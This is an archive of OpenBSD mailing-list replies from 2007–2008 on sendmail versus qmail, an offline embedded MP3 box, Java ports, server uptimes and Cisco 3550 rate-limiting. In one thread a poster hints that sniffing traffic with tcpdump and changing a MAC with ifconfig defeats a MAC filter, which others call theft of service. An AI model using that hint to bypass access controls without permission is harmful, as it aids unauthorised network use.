didn't really see enough return in terms of new developers to the project,
which, frankly, being selfish on OpenBSD's part, is the only reason for us to do it.

Both Ken Westerback and I organized our end of it and dealt with the Google
paperwork the two years we did it. Neither of us is willing to do it again,
and while I won't directly speak for Ken, I would not support us spending
effort on this when there are lots of other things to do. It just doesn't have
the benefit for OpenBSD, especially in light of the effort of the volunteers
necessary to participate.



On Sun, Apr 2, 2017 at 8:54 AM, Luke Small  wrote:



Re: Replace sendmail with qmail?

2007-11-30 Thread Pete Vickers
In case it's needed (which I doubt), I'll voice my VERY strong
preference for sendmail instead of all these other pretenders.


/Pete


On 30 Nov 2007, at 10:25 AM, Matthew Dempsky wrote:


On 11/30/07, Peter Hessler <[EMAIL PROTECTED]> wrote:
That being said, it's really easy to install qmail yourself and have it
replace the in-tree sendmail (see mailer.conf).


Right, and maybe for a future OpenBSD release you could swap the
placement of sendmail and qmail in that sentence. :-)

To be clear, I suggested replacing sendmail with qmail because 1) it
would further OpenBSD's efforts of eliminating unacceptably licensed
code and 2) I'm familiar with qmail, so I can actually contribute
patches.  If there's a more suitable MTA, I'd be even happier to see
it go in (as long as I can keep using qmail ;-).




Re: Embedding OpenBSD

2007-12-28 Thread Pete Vickers
step 1. get any old iPod on eBay
step 2. put a single mp3 tune on it
step 3. place it in a big box, with the play button located right
under a coin-sized slot


OpenBSD is great, but it's not the hammer for all nails...

/Pete


On 28 Dec 2007, at 3:34 AM, Nick Holland wrote:

> I've got a little project I'm working on here.
> It involves stuffing a computer in a donation box with a
> money detector, so every time someone tosses money in the box,
> it plays an MP3 file.
>
> (no, you can't make a living at this.  At least, *I* can't)
>
> The first two of these I did were many years ago, and we used a
> 486 running a simple DOS app.  Well, computers that run DOS well
> are gone, and trying to bring up a new program to play sound
> files on any of the modern sound chips would be (not) fun...and
> annoying the next time the hardware all changes again.
>
> So, for this generation, I'm using OpenBSD, mpg321, and a 1G
> CF flash device attached to an CF-> IDE interface.
>
> However, this is the first time I've ever done an OpenBSD system
> that wasn't going to be attached to some kind of network for
> (hopefully) years at a time.  In fact, hopefully, it will NEVER
> be attached to a network.  And, while I got a 1G CF device, I
> could imagine doing something stupid and having it slowly fill
> the CF media and six months from now getting a call saying, "It
> died.  Come fix it", and since it will be in another country and
> probably a ten hour drive away, I'd like to avoid that. :)
> Once this thing is deployed, I won't have access to it at all,
> so I'll have no ability to spot a potential problem or fix it.
>
> SO, to try to keep things quiet, I've disabled the daily, weekly,
> and monthly scripts, I've disabled sendmail in /etc/rc.conf.local.
> Before I ship it out, I'll move /var/log and /var/tmp to point to
> a mfs system, so hopefully, if something starts logging, a power
> cycle will dump everything.  Only 60M is mounted RW, so it fsck's
> very quickly, and my app writes only to the MFS.
>
> What have I forgotten?  Is there anything else I can do to avoid
> slapping my forehead and saying, "D'oh! Forgot to ..." before I
> ship it out fully detached?  The good news is I'm pretty sure
> there is at least one OpenBSD developer near-by, but that's just
> all the more reason to make sure I don't screw it up, I'll never
> live it down. :)
>
> Nick.



Re: avoiding a mac address filter

2008-01-08 Thread Pete Vickers
Well, this sounds very much to me like 'We know (for example) Windows
security is weak by design, but it's not MS's fault for a crap
system, it's the bad guys' fault for actually realising it'. I
disagree: MS have no excuse for not providing sufficient/suitable
security in their products, and may even have a legal obligation to
do so.


Also, whilst I would never condone hacking (cracking), I believe
in freedom of information, and even a potential security expert must
begin his/her learning somewhere. It is common knowledge, and freely
available on the Internet (http://www.openbsd.org/cgi-bin/man.cgi),
that tcpdump may allow you to watch network traffic on a shared
medium such as WLAN, and also that ifconfig may allow you to change
the MAC address on your network card. Note that if your country
interprets freedom in such a fashion that it would implicate me here,
then this email is intended to improve the ability of a 'good guy',
not encourage a 'bad guy'...


To put it another way, is it my fault for teaching you to drive a
car, if you then use those skills to run down innocent pedestrians?



/Pete



On 7 Jan 2008, at 8:28 PM, Andreas Maus wrote:


On Mon, Jan 07, 2008 at 12:19:26PM -0500, Dave Anderson wrote:

On Mon, 7 Jan 2008, Pau Amaro-Seoane wrote:


loosen up a bit, you're too tight up... I just want to check my
emails, I don't want to download p0nr movies


Theft of service is theft, regardless of how much or little service
you're stealing. If someone's gone to the trouble of filtering on MAC
addresses, they've clearly indicated that they're not a public service
-- and no amount of weasel-wording will get around that.

ACK!

Furthermore, depending on your origin this is considered a criminal
act if you circumvent the MAC filter. E.g. here in Germany you will
pay for that crime or go to jail (for up to 5 years) for doing this,
for a: sniffing the traffic to get a valid IP/MAC association, or
b: breaking into the system which is protected
(even a MAC filter is considered a protection).

And NO A SYSTEM THAT USES MAC FILTERING IS NOT AN OPEN ACCESSPOINT!

Oh and by the way it may be considered a crime trying to do or giving
you tips how to do this (incitement).

If you have a similar system at work and you will try to figure out
how bad guys may attack this ... well talk to your boss or your IT
security team. Maybe you will be assigned to a penetration test.
But in this case you have to sign an agreement on what you should
do, what you shouldn't do, and when and how to do such tests.
(and if you are in a position to do penetration test you wouldn't
ask such questions ;) )

So don't expect any answer on this list.

Andreas.

--
Windows 95: A 32-bit patch for a 16-bit GUI shell running on top of
an 8-bit operating system written for a 4-bit processor by a 2-bit
company who cannot stand 1 bit of competition.




Re: BSD Port from OpenJDK

2008-10-15 Thread Pete Vickers

Hi,


Whilst I fully acknowledge the stigma that goes with Java, I'm
very grateful to Kurt et al. for making it run under OpenBSD. It has
saved me from having to admin extra Linux/Solaris boxes many times,
when customers insist on Java. I'm also looking forward to merely
pkg_add'ing it instead of playing "hunt the patch after license
clicking" as was previously necessary.


Nice work ! Appreciated.


/Pete





On 15 Oct 2008, at 02:06, Kurt Miller wrote:


On Tuesday 14 October 2008 11:13:41 am new_guy wrote:

Ben Adams-3 wrote:


Just wondering if this will effect OpenBSD with java:
Per the interim governance guidelines for Projects [1] I'm pleased
to announce the creation of the BSD Port Project



Java is nasty. There... I said it and it is true. The goopy OOP of Java will
tarnish anything it touches. Personally, I hope Java (in all of its virtual
glory) never makes it into OpenBSD at all. Real men will cry man tears when
OpenBSD ships with Java.



Uninformed. We've had Java for years and now we have packages:

ftp://ftp.openbsd.org/pub/OpenBSD/snapshots/packages/i386/jdk-1.7.0.00b24p2.tgz

4.4 will have packages also.

Your negativity sucks. Porting Java to OpenBSD was and is not
a trivial effort. It also serves as an excellent test bed for
threads, the runtime linker and large memory applications.

Porting Java to OpenBSD enabled the LOCKSS project to use it
for its noble goals. It uncovered deadlocks in our pthread
lib that resulted in large improvements to libpthread. Its use
of dlopen() and friends resulted in significant improvements
in our runtime linker. Oh and who made those improvements???
The same person who took the time to port Java to OpenBSD!! Me
and other OpenBSD developers who saw the need to improve things.

BTW, all those system level improvements have made significant
stability gains for applications like firefox, KDE, OpenOffice,
Asterisk, etc, etc which all use threads and dlopen() a lot.

Quite frankly I'm pretty upset at all the 'Java sucks' banter on
misc. If you and the other naysayers don't realize that porting
Java to OpenBSD was a 'Good-Thing' then you are just UNINFORMED!

-Kurt




Re: Longest Uptime?

2008-10-30 Thread Pete Vickers

Okai,

here's my $0.02 on the subject:

http://systemnet.no/ios-uptime.jpg


/Pete

On 29 Oct 2008, at 18:49, guilherme m. schroeder wrote:


Hi,

Uptimes suck. Here's the biggest I've ever seen in the company I
work for:


[EMAIL PROTECTED] ~]$ uname -a
SunOS optg998 5.6 Generic_105181-26 sun4u sparc SUNW,UltraSPARC-IIi-cEngine

[EMAIL PROTECTED] ~]$ uptime
 3:40pm  up 2639 day(s), 13:50,  1 user,  load average: 0.08, 0.07, 0.06

[EMAIL PROTECTED] ~]$ date
Wed Oct 29 15:45:24 BRST 2008
[EMAIL PROTECTED] ~]$ psrinfo -v
Status of processor 0 as of: 10/29/08 15:41:07
 Processor has been on-line since 08/08/01 00:50:54.
 The sparc processor operates at 440 MHz,
   and has a sparc floating point processor.
[EMAIL PROTECTED] ~]$ dmesg | tail -5
SUNW,hme0: Using External Transceiver
SUNW,hme0: 100 Mbps half-duplex Link Up
dump on /dev/md/dsk/d50 size 2042608K
SUNW,hme0: Using External Transceiver
SUNW,hme0: full-duplex Link Up

Ok, it's not OpenBSD, blame me. But what I liked is that this
machine has been working for 2639 days and it still blinks green LEDs. The
hard disk never gave up either. No errors in dmesg.
It's a Netra T1 machine, running our internal DNS server. I think
we'll replace it when it dies ;)

On Wed, Oct 29, 2008 at 7:15 AM, Gilles Chehade <[EMAIL PROTECTED]> wrote:

new_guy wrote:


I know. Longest uptime is silly, macho, pointless stuff... but I ran across
an old SunOS 2.6 box that had been up for 387 days. It had been hacked. The
only reason it was not an open mail relay is that /var was full. So, I
thought to myself, "I bet I could run an OpenBSD box for that amount of time
or longer without getting hacked and without doing much to it." Just
wondering what's the longest OpenBSD uptime some folks on misc have seen?


Thanks



It is not the size of your uptime that matters, it is what you do with it.


Gilles




Re: Per User Bandwidth Limiting

2008-12-14 Thread Pete Vickers
Indeed, I believe whilst the c3750 supports traffic shaping, the c3550 does
not.


BTW, instead of assigning a /30 per user and wasting 75% of your IP
address space, try looking at the 'private vlan' IOS command, which
should allow you to use much bigger subnets and still control the
user-user traffic.


/Pete






On 14 Dec 2008, at 13:10, Marco Matarazzo wrote:


Hi Justin,

I have an ISP situation where there are about 1000 users sitting behind Cisco
3550 switches. Each port is 1 user and is configured with an individual
VLAN where each VLAN is assigned a small network subnet and corresponding
DHCP scope.

The problem is that it seems (so I have been told) that these 3550's will not
effectively bandwidth limit at the port level. Incoming bandwidth is
limited as configured, but outgoing is not. So, I am looking at a pf
solution but google is not turning up any specific information for such a
situation.




This is not true. It's more tricky, but you can actually limit both inbound
and outbound at the port level, and it's quite effective too. Of course
OpenBSD is capable of that too, but for 1000 vlans you'll have to split the
load across multiple firewalls (or multiple clusters of firewalls) since
there're hardcoded limits on the number of queues you can create (256 cbqs
and 64 hfsc if I remember well, it's been discussed in the past however!)


The config for the 3550 is something like this:

Define the class-maps (all-in and all-out are different because of hardware
limitations):

class-map match-any all-out
 match ip dscp default
class-map match-any all-in
 match access-group 100

Define the policy maps:

policy-map 1mbit-in
 class all-in
   police 1024000 192000 exceed-action drop
policy-map 1mbit-out
 class all-out
   police 1024000 192000 exceed-action drop

And apply the policies to the interfaces:

interface FastEthernet0/4
 description CustomerX
 no switchport
 ip address 1.2.3.4 255.255.255.x (or if it's a switchport, just
 "switchport mode access" and then "switchport access vlan x")
 ip rip advertise 3
 no cdp enable
 service-policy input 1mbit-in
 service-policy output 1mbit-out

Also note that this is rate-limiting, not bandwidth shaping, but it may fit
your requirements!

Cheers,
]\/[arco



